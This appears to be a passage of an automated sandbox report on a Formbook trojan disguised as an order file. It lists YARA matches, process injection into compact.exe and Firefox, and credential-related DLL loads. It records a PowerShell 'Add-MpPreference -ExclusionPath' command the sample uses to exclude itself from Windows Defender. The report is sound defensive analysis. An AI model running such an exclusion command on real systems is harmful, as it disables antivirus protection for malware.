Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03701460	12_2_03701460
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CF43F	12_2_037CF43F
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CFB76	12_2_037CFB76
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03785BF0	12_2_03785BF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0374DBF9	12_2_0374DBF9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0372FB80	12_2_0372FB80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03783A6C	12_2_03783A6C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CFA49	12_2_037CFA49
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C7A46	12_2_037C7A46
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037BDAC6	12_2_037BDAC6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03755AA0	12_2_03755AA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037ADAAC	12_2_037ADAAC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037B1AA3	12_2_037B1AA3
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03719950	12_2_03719950
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0372B950	12_2_0372B950
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037A5910	12_2_037A5910
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0377D800	12_2_0377D800
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037138E0	12_2_037138E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CFF09	12_2_037CFF09
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036D3FD5	12_2_036D3FD5
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_036D3FD2	12_2_036D3FD2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CFFB1	12_2_037CFFB1
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03711F92	12_2_03711F92
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03719EB0	12_2_03719EB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C7D73	12_2_037C7D73
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037C1D5A	12_2_037C1D5A
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03713D40	12_2_03713D40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_0372FDC0	12_2_0372FDC0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03789C32	12_2_03789C32
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_037CFCF2	12_2_037CFCF2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DD1C80	12_2_02DD1C80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DEA710	12_2_02DEA710
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCCE70	12_2_02DCCE70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCCE67	12_2_02DCCE67
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCB2EB	12_2_02DCB2EB
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCD090	12_2_02DCD090
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DCB110	12_2_02DCB110
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DD37C0	12_2_02DD37C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_02DD37BE	12_2_02DD37BE
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03A2A275	12_2_03A2A275
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03A2B018	12_2_03A2B018
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03A2BAF4	12_2_03A2BAF4
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03A2BFAD	12_2_03A2BFAD
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03A2BD7B	12_2_03A2BD7B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 12_2_03A2BC15	12_2_03A2BC15

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 03757E54 appears 111 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 0377EA12 appears 86 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 0378F290 appears 105 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 036FB970 appears 280 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 03745130 appears 58 times
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: String function: 0179B970 appears 280 times
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: String function: 017E5130 appears 58 times
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: String function: 0182F290 appears 105 times
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: String function: 017F7E54 appears 103 times
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Code function: String function: 0181EA12 appears 86 times

Sample file is different than original file name gathered from version info

Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2131268068.0000000006EB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2114773908.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002861000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000000.2096605729.0000000000560000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQgGC.exe> vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2138549827.000000000D100000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001258000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.000000000189D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs spec 4008670601 AZTEK Order.exe
Source: spec 4008670601 AZTEK Order.exe	Binary or memory string: OriginalFilenameQgGC.exe> vs spec 4008670601 AZTEK Order.exe

Uses 32bit PE files

Source: spec 4008670601 AZTEK Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: spec 4008670601 AZTEK Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: _0020.AddAccessRule
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: _0020.AddAccessRule
Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LhKXYDnDrCC31IYC1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LhKXYDnDrCC31IYC1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LhKXYDnDrCC31IYC1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.cs	Security API names: _0020.AddAccessRule

Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DE2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: A;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/7@14/13

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spec 4008670601 AZTEK Order.exe.log

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Process created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
